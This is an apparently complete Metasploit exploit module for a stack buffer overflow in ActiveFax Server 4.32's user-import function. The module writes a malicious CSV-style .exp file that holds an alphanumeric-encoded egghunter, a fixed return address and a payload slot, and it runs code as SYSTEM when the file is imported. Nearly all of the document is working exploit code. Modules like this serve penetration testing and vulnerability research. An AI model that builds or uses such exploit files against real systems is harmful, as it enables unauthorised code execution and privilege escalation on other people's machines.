##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
#   http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::FILEFORMAT
	include Msf::Exploit::Remote::Egghunter

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'ActiveFax (ActFax) 4.3 Client Importer Buffer Overflow',
			'Description'    => %q{
					This module exploits a vulnerability in ActiveFax Server. The vulnerability is
				a stack based buffer overflow in the "Import Users from File" function, due to the
				insecure usage of strcpy while parsing the csv formatted file. The module creates a
				.exp file that must be imported with ActiveFax Server. It must be imported with the
				default character set 'ECMA-94 / Latin 1 (ISO 8859)'. The module has been tested
				successfully on ActFax Server 4.32 over Windows XP SP3 and Windows 7 SP1. In the
				Windows XP case, when ActFax runs as a service, it will execute as SYSTEM.
			},
			'License'        => MSF_LICENSE,
			'Author'         =>
				[
					'Craig Freyman', # Vulnerability discovery and PoC
					'Brandon Perry', # Metasploit module
					'juan vazquez'   # Metasploit module
				],
			'References'     =>
				[
					[ 'EDB', '20915' ],
					[ 'URL', 'http://www.pwnag3.com/2012/08/actfax-local-privilege-escalation.html' ]
				],
			'DefaultOptions' =>
				{
					'ExitFunction' => 'process',
				},
			'Platform'       => 'win',
			'Payload'        =>
				{
					'Space' => 4000,
					'BadChars' => "",
					'DisableNops' => true,
				},

			'Targets'        =>
				[
					[ 'ActFax 4.32 / Windows XP SP3 EN / Windows 7 SP1',
						{
							'Ret'	  => 0x00401b22, # ret from ActFax.exe]
							'Offset'  => 512
						}
					]
				],
			'Privileged'     => true,
			'DisclosureDate' => 'Aug 28 2012',
			'DefaultTarget'	 => 0))

		register_options([OptString.new('FILENAME', [ false, 'The file name.', 'msf.exp']),], self.class)

	end

	def exploit

		#These badchars do not apply to the final payload
		badchars = (0x00..0x20).to_a.pack("C*") + "\x7c"

		eggoptions =
			{
				:checksum => true,
				:eggtag => 'w00t'
			}

		hunter,egg = generate_egghunter(payload.encoded, badchars, eggoptions)

		[ 'x86/alpha_upper'].each { |name|
			enc = framework.encoders.create(name)
			if name =~/alpha/
				enc.datastore.import_options_from_hash({ 'BufferRegister' => 'ESP' })
			end
			hunter = enc.encode(hunter, nil, nil, platform)
		}

		buffer = "\x83\xC4\x7f" * 19 # add esp, byte 0xff
		buffer << "\x83\xC4\x23" # add esp, byte 0x23
		buffer << hunter
		buffer << rand_text(target['Offset'] - buffer.length, badchars)
		buffer << [target.ret].pack("V")
		buffer << egg

		file =  "User Name\tEntire User Name\tPassword\tAlias-Names\tGroup\tDirect Dialing\tCost Account\tPermissions\tComments\tUser-Defined\t"
		file << "Predefined Settings\tName 1\tName 2\tName 3\tName 4\tName 5\tDepartment\tAttention of\tPhone 1\tPhone 2\tFax Number\tE-Mail\t"
		file << "Coverpage Non-Windows\tOverlay Non-Windows\tCoverpage Windows\tOverlay Windows\tUser-Defined\tPrinter Settings\tAutomatic Printing Outgoing\t"
		file << "Printer Name Outgoing\tReport Outgoing\tAutomatic Printing Incoming\tPrinter Name Incoming\tReport Incoming\tNotification Outgoing\t"
		file << "Email Outgoing\tNotification Incoming\tEmail Incoming\tAttach Original Message\tUser-Defined Archive Settings\tExport Outgoing\t"
		file << "Export Incoming\tExport-Path\tMark as Read\r\n"
		file << buffer
		file << "\r\n"

		file_create(file)

	end
end